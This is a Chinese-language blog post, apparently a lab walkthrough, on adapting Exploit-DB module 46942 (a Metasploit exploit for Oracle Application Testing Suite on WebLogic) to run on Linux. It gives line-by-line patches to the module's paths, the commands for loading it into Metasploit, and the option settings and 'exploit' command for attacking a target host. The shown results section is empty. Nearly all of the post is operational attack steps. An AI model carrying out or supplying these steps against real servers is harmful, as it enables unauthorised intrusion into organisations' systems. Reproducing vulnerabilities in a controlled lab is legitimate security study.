赞
踩
此exp来源:https://www.exploit-db.com/exploits/46942
其实这个exp在Linux环境下也可以复现成功,只不过需要改一下从官网下载的源码;
源码第62行,可以看到最后一项是Windows系统下的路径表示方式,需要改成Linux系统下的对应路径
- OptString.new('DefaultOatsPath', [true, 'The default path for OracleATS', 'C:\\OracleATS'])
- #用如下代码替换
- OptString.new('DefaultOatsPath', [true, 'The default path for OracleATS','/root/Oracle/Middleware/user_projects/domains/'])
源码第187行,同上
- app_path = Rex::FileUtils.normalize_win_path(default_oats_path, 'oats\\servers\\AdminServer\\upload')
- #用如下代码替换
- app_path = Rex::FileUtils.normalize_unix_path(default_oats_path, 'base_domain/servers/AdminServer/upload')
源码238行,同上
- app_path = Rex::FileUtils.normalize_win_path(default_oats_path, "oats\\servers\\AdminServer\\upload\\#{war_name}.war")
- #用如下代码替换
- app_path = Rex::FileUtils.normalize_unix_path(default_oats_path, "base_domain/servers/AdminServer/upload/#{war_name}.war")
接下来,将该脚本导入metasploit:进入脚本的父目录(这里我将脚本命名为1.rb,这里一个替换成你自己的脚本名称)
- sudo cp 1.rb /opt/metasploit-framework/embedded/framework/modules/exploits/
- sudo chmod +x /opt/metasploit-framework/embedded/framework/modules/exploits/1.rb
在终端打开metasploit,重新加载所有脚本
- reload_all
- #因为我将脚本命名为1.rb,所以metasploit导入脚本之后将其标记为1
- use exploits/1
- #可以看一下此脚本需要设置哪些参数
- show options
- #设置脚本需要的参数
- set RHOSTS <ip>
- set RPORT <port>
- set OATSUSERNAME <weblogic_user_name>
- set OATSPASSWORD <password>
对于靶机,需要安装符合要求的weblogic版本;然后关闭防火墙;在攻击机上接着上述命令攻击:
exploit
攻击效果如下:
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。